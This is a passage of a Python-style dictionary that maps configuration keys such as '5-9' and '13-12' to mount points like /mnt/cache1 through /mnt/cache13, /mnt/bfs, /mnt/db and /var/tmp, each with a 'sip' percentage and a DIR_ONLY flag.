'5-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-6': {'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'5-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-7': {'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}},
'5-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-0': {'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'0-1': {'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'6-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'6-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'6-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'6-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'0-2': {'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}},
'0-3': {'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}},
'9-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'13-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'13-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'13-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'13-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'1-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}},
'1-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '80', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '20', 'DIR_ONLY': False}},
'1-1': {'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'8-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'1-3': {'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}},
'1-2': {'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '20', 'DIR_ONLY': False}},
'1-5': {'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '80', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'1-4': {'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '80', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'1-7': {'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}},
'8-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'8-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'8-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'5-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'5-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'5-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'5-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'5-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'5-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'3-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'3-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'3-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
